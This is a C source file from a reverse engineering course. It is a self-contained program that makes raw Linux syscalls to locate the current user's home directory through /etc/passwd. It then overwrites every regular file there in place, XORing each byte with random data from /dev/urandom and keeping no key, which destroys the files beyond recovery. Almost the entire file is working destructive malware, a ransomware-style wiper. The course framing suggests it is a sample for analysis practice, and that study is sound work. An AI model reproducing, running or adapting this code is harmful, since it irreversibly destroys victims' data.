//
// Reverse Engineering course
// Author: martin.uy/reverse
// License: Creative Commons Attribution-ShareAlike (CC-BY-SA)
//

#define __NR_READ 3
#define __NR_WRITE 4
#define __NR_OPEN 5
#define __NR_CLOSE 6
#define __NR_CHDIR 12
#define __NR_LSEEK 19
#define __NR_FSTATFS 100
#define __NR_GETUID 199
#define __NR_GETDENTS 220

#define _syscall0(name)                 \
do {                                    \
    __asm__ __volatile__                \
    (                                   \
        "int $0x80\n\t"                 \
        : "=a" (ret)                    \
        : "a"(__NR_##name)              \
    );                                  \
} while(0);

#define _syscall1(name,arg1)            \
do {                                    \
    __asm__ __volatile__                \
    (                                   \
        "int $0x80\n\t"                 \
        : "=a" (ret)                    \
        : "a"(__NR_##name),             \
          "b"(arg1)                     \
    );                                  \
} while(0);

#define _syscall2(name,arg1,arg2)       \
do {                                    \
    __asm__ __volatile__                \
    (                                   \
        "int $0x80\n\t"                 \
        : "=a" (ret)                    \
        : "a"(__NR_##name),             \
          "b"(arg1),                    \
          "c"(arg2)                     \
    );                                  \
} while(0);

#define _syscall3(name,arg1,arg2,arg3)  \
do {                                    \
    __asm__ __volatile__                \
    (                                   \
        "int $0x80\n\t"                 \
        : "=a" (ret)                    \
        : "a"(__NR_##name),             \
          "b"(arg1),                    \
          "c"(arg2),                    \
          "d"(arg3)                     \
    );                                  \
} while(0);

// long sys_read(unsigned int fd, char *buf, size_t count);
#define _sys_read(fd, buf, count) _syscall3(READ, fd, buf, count)

// long sys_close(unsigned int fd);
#define _sys_close(fd) _syscall1(CLOSE, fd)

// long sys_write(unsigned int fd, const char *buf, size_t count);
#define _sys_write(fd, buf, count) _syscall3(WRITE, fd, buf, count)

// long sys_open(const char *filename, int flags, umode_t mode);
#define _sys_open(filename, flags, mode) _syscall3(OPEN, filename, flags, mode)

// long sys_fstatfs(unsigned int fd, struct compat_statfs *buf);
#define _sys_fstatfs(fd, buf) _syscall2(FSTATFS, fd, buf)

// long _sys_getdents(unsigned int fd, struct compat_linux_dirent *dirent, unsigned int count);
#define _sys_getdents(fd, dirent, count) _syscall3(GETDENTS, fd, dirent, count)

// long sys_chdir(const char *filename);
#define _sys_chdir(filename) _syscall1(CHDIR, filename)

// long sys_lseek(unsigned int fd, off_t offset, unsigned int whence);
#define _sys_lseek(fd, offset, whence) _syscall3(LSEEK, fd, offset, whence)

// long sys_getuid(void);
#define _sys_getuid() _syscall0(GETUID)

#define S_IRUSR 00400
#define S_IWUSR 00200

#define O_RDONLY	00000000
#define O_WRONLY	00000001
#define O_RDWR		00000002
#define O_NONBLOCK	00004000
#define O_DIRECTORY	00200000	/* must be a directory */
#define O_CLOEXEC	02000000	/* set close_on_exec */

#define DT_REG		8

#define DENTS_BUFFER_SIZE 32768

#define SEEK_CUR	1

typedef struct {
    int	val[2];
} __kernel_fsid_t;

typedef __kernel_fsid_t	compat_fsid_t;
struct linux_dirent64 {
   unsigned long long        d_ino;    /* 64-bit inode number */
   unsigned long long        d_off;    /* 64-bit offset to next structure */
   unsigned short d_reclen; /* Size of this dirent */
   unsigned char  d_type;   /* File type */
   char           d_name[]; /* Filename (null-terminated) */
};

struct compat_statfs {
	int		f_type;
	int		f_bsize;
	int		f_blocks;
	int		f_bfree;
	int		f_bavail;
	int		f_files;
	int		f_ffree;
	compat_fsid_t	f_fsid;
	int		f_namelen;	/* SunOS ignores this field. */
	int		f_frsize;
	int		f_flags;
	int		f_spare[4];
};

static unsigned int strlen(char* buf) {
    unsigned int count = 0;
    while (buf[count] != 0) {
        count++;
    }
    return count;
}

static void itoa(char* buf, unsigned int number) {
    int temp, count=0, i, cnd=0;
    for(temp=number;temp!=0;temp/=10,count++);    
    for(i=count-1,temp=number; i>=cnd; i--) {
        buf[i]=(temp%10)+0x30;
        temp/=10;
    }
}

static void _strcat(char* dst, char* src) {
    unsigned int i = 0;
    unsigned int dst_size = strlen(dst);
    unsigned int src_size = strlen(src);
    for (;i < src_size; i++) {
        dst[dst_size + i] = src[i];
    }
    dst[dst_size + i] = 0;
}

int main(){
    long ret;
    char home_folder_path[256] = {0x0};
    char line_buf[256];

    _strcat(home_folder_path, "/home/");

    // Get home folder
    _sys_getuid();
    char uid_as_string[11] = {0x0};
    itoa(uid_as_string, ret);

    _sys_open("/etc/passwd", O_RDONLY, S_IRUSR|S_IWUSR);
    int fd_passwd = ret;
    if (fd_passwd < 0) { goto error; }

    {
        long read_ret;
        char read_buffer;
        int line_off;
        int uid_off;
        int uid_matched;
        enum state_line { USER, X, UID, OTHER };
        enum state_line state;
        int i = 0;
        unsigned int home_folder_path_base_size = strlen(home_folder_path);
        while (1) {
            _sys_read(fd_passwd, &read_buffer, 1);
            read_ret = ret;
            if (read_ret == 1 && read_buffer != '\n') {
                line_buf[i] = read_buffer;
                i++;
            } else {
                line_buf[i] = 0;
                if (i > 0) { 
                    state = USER;
                    uid_off = 0;
                    uid_matched = 1;
                    for (line_off = 0; line_off < i; line_off++) {
                        if (line_buf[line_off] == ':') {
                            if (state == USER) {
                                state = X;
                            } else if (state == X) {
                                state = UID;
                            } else if (state == UID) {
                                state = OTHER;
                            }
                            continue;
                        }
                        if (state == USER) {
                            home_folder_path[home_folder_path_base_size + line_off] = line_buf[line_off];
                            home_folder_path[home_folder_path_base_size + line_off + 1] = 0;
                        }
                        if (state == X) {
                            continue;
                        }
                        if (state == UID) { 
                            if (line_buf[line_off] != uid_as_string[uid_off]) {
                                uid_matched = 0;
                            }
                            uid_off++;
                        }
                        if (state == OTHER) { 
                            if (strlen(uid_as_string) != uid_off) {
                                uid_matched = 0;
                            }
                            break;
                        }
                    }
                    if (uid_matched == 0) {
                        home_folder_path[home_folder_path_base_size] = 0;
                    } else {
                        break;
                    }
                }
                i = 0;
                if (read_ret != 1) { break; }
            }
        }
    }

    _sys_close(fd_passwd);

    #ifdef _DEBUG
    _sys_write(0, home_folder_path, strlen(home_folder_path));
    _sys_write(0, "\n", 1);
    #endif // _DEBUG

    _sys_open(home_folder_path, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC, S_IRUSR|S_IWUSR);
    int fd_home_directory = ret;
    if (fd_home_directory < 0) { goto error; }

    _sys_open("/dev/urandom", O_RDONLY, S_IRUSR|S_IWUSR);
    int fd_urandom = ret;
    if (fd_urandom < 0) { goto error; }

    _sys_chdir(home_folder_path);
    if (ret != 0) {goto error; }

    struct compat_statfs home_directory_statfs;
    _sys_fstatfs(fd_home_directory, &home_directory_statfs);
    if (ret != 0) { goto error; }

    char fd_home_directory_ents_buffer[DENTS_BUFFER_SIZE];
    struct linux_dirent64* fd_home_directory_ents_buffer_ptr = (struct linux_dirent64*)fd_home_directory_ents_buffer;
    _sys_getdents(fd_home_directory, fd_home_directory_ents_buffer, DENTS_BUFFER_SIZE);

    while(1) {
        if (fd_home_directory_ents_buffer_ptr->d_type == DT_REG) {
            _sys_open(fd_home_directory_ents_buffer_ptr->d_name, O_RDWR, S_IRUSR|S_IWUSR);
            int fd_home_file = ret;
            if (fd_home_file > 0) {
                #ifdef _DEBUG
                _sys_write(0, fd_home_directory_ents_buffer_ptr->d_name, strlen(fd_home_directory_ents_buffer_ptr->d_name));
                _sys_write(0, "\n", 1);
                #endif // _DEBUG
        
                char read_buffer;
                char random_buffer;
                while (1) {
                    _sys_read(fd_urandom, &random_buffer, 1);
                    _sys_read(fd_home_file, &read_buffer, 1);
                    if (ret != 1) { break; }
                    _sys_lseek(fd_home_file, -1, SEEK_CUR); // go back to read char                
                    read_buffer = read_buffer ^ random_buffer;
                    #ifdef _DEBUG
                    _sys_lseek(fd_home_file, 1, SEEK_CUR); 
                    #else // _DEBUG
                    _sys_write(fd_home_file, &read_buffer, 1);
                    #endif // _DEBUG

                }
                _sys_close(fd_home_file);
            }
        }
        if (fd_home_directory_ents_buffer_ptr->d_off == 0) {
            break;
        }
        fd_home_directory_ents_buffer_ptr = (struct linux_dirent64*)(((char*)fd_home_directory_ents_buffer_ptr) + fd_home_directory_ents_buffer_ptr->d_reclen);
    }
    _sys_close(fd_urandom);
    _sys_close(fd_home_directory);
    goto success;
success:
    return 0;
error:
    return -1;
}
